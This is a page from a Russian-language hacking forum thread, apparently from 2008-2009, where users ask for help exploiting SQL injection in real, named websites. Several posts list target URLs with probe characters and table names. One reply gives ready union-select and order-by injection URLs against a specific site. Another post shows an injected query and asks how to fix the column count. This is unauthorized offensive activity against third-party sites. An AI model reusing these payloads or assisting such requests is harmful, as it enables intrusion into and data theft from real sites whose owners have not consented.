HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > SЕО/Финансовые задачи/Социальные сети > Покупка, Продажа, Обмен > Просьбы о взломах
Перезагрузить страницу Помощь Sql Иньекции.
   
 
Страница 33 из 41 « Первая < 23 29 30 31 32 33 34 35 36 37 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #321  
Старый 06.12.2008, 23:21
Merl00k
Познающий
Регистрация: 06.11.2008
Сообщений: 32
Провел на форуме:
934986

Репутация: 21
По умолчанию
Цитата:
Fatal error: Cannot use object of type DB_Error as array in /home/shytobuy/domains/shytobuy.com/public_html/product.php on line 85
У меня такое ощущение что это раскрытие путей
 

  #322  
Старый 14.12.2008, 15:54
buxhost
Новичок
Регистрация: 08.12.2008
Сообщений: 7
Провел на форуме:
169639

Репутация: 1
По умолчанию
http://goodbux.buxhost.ru/login.php?'
Есть ли тут инъекция, если да то как можно её раскрутить
:::::::::: есть таблицы ::::::::::::
* tb_ads
* tb_ads_categories
* tb_advertisers
* tb_buyref
* tb_cheaters
* tb_checkfaq
* tb_clickpack
* tb_config
* tb_contact
* tb_history
* tb_messenger
* tb_payme
* tb_refset
* tb_site
* tb_upgrade
* tb_users
* users_online
 

  #323  
Старый 15.12.2008, 19:05
Merl00k
Познающий
Регистрация: 06.11.2008
Сообщений: 32
Провел на форуме:
934986

Репутация: 21
По умолчанию
buxhost
че то я вывод ошибки незаметил )) и в коде ее тожа походу нет
 

  #324  
Старый 16.12.2008, 22:53
buxhost
Новичок
Регистрация: 08.12.2008
Сообщений: 7
Провел на форуме:
169639

Репутация: 1
По умолчанию
Еcть иньекции вообще на этом сайте
проверьте плз
 

  #325  
Старый 20.12.2008, 16:26
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию
Цитата:
Сообщение от [Isusik..]  
http://kengu.ru/news.php?get=4172' вот sql , но я не шарю, помогите раскавярть
Там её нету )
 

  #326  
Старый 26.12.2008, 21:30
Z0mbie!
Новичок
Регистрация: 14.08.2007
Сообщений: 10
Провел на форуме:
27258

Репутация: 1
По умолчанию
http://ufaman.ru/internet/local/?request=1'&type=1

Собсо сабж..кто что посоветует?
 

  #327  
Старый 26.12.2008, 21:53
ХаЬа
Banned
Регистрация: 18.01.2008
Сообщений: 6
Провел на форуме:
29103

Репутация: 25
По умолчанию
слепая инъекция видимо
http://ufaman.ru/internet/local/?request=1%27+order+by+2/*&type=1
http://ufaman.ru/internet/local/?request=-999+union+select+9999,7777/*&type=1
 

  #328  
Старый 02.01.2009, 00:16
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию
Зачем те сайт,стоящий на третьей версии мускула?))
 

  #329  
Старый 09.01.2009, 19:51
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию
у меня маленький вопрос, вобшем есть такой оригинальный запрос:

Цитата:
Select distinct
id,
date,
provenance_country,
provenance_city,
shelf_mark,
language,
fully_digitized,
display_record,
archive_country,
archive_city,
archive_name,
archive_home_page,destination_url,
short_description,
sample_image_link,
bibliography
From `Repository` , `Manuscripts` , `Web_Info` , `Misc_Info` ,`Ms_des`
Where
Manuscripts.repository_id = Repository.repository_id
and
Manuscripts.web_info_id = Web_Info.web_info_id
and
Manuscripts.misc_info_id = Misc_Info.misc_info_id
and
Ms_des.man_id=Manuscripts.id
and
display_record=1
and
(locate("Greek", manuscripts.language) OR locate("Greek", ms_des.text_language)) ORDER BY 'archive_name' ASC
то есть простым подсчетам видим что выбераеться 16 значений, вот запрос с sql injection
Цитата:
Select distinct
id,
date,
provenance_country,
provenance_city,
shelf_mark,
language,
fully_digitized,
display_record,
archive_country,
archive_city,
archive_name,
archive_home_page,
destination_url,
short_description,
sample_image_link,
bibliography
From `Repository` , `Manuscripts` , `Web_Info` , `Misc_Info` ,`Ms_des`
Where
Manuscripts.repository_id = Repository.repository_id
and
Manuscripts.web_info_id = Web_Info.web_info_id
and
Manuscripts.misc_info_id = Misc_Info.misc_info_id
and
Ms_des.man_id=Manuscripts.id
and
display_record=1
and
(TRUE) union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 /*) ORDER BY 'archive_name' ASC
но выдаеться ошибко при этом
The used SELECT statements have a different number of columns, но как это возможно, ведь из запроса ясно видно что выбераеться 16 значений, и если например +order+by+16/* ошибки не вызывает, то +order+by+17/* вызывает ошибку
Unknown column '17' in 'order clause', уязвимый параметр вставляеться в последнем and(, почему такое происходит, подскажите.
З.Ы. я прошолся до 70 колонки и до первой union select, все равно пишет The used SELECT statements have a different number of columns. Я подозреваю что это из-за distinct.
Последний раз редактировалось AkyHa_MaTaTa; 09.01.2009 в 19:57..
 

  #330  
Старый 09.01.2009, 19:57
zifanchuck
Постоянный
Регистрация: 27.10.2008
Сообщений: 491
Провел на форуме:
4002393

Репутация: 464
Отправить сообщение для zifanchuck с помощью ICQ
По умолчанию
скажи сайт
или кинь в личку
 
 
Страница 33 из 41 « Первая < 23 29 30 31 32 33 34 35 36 37 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
ПомогитЕ !!! подалуста найти кряк гейлордфакерЪ Болталка 2 30.08.2007 14:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ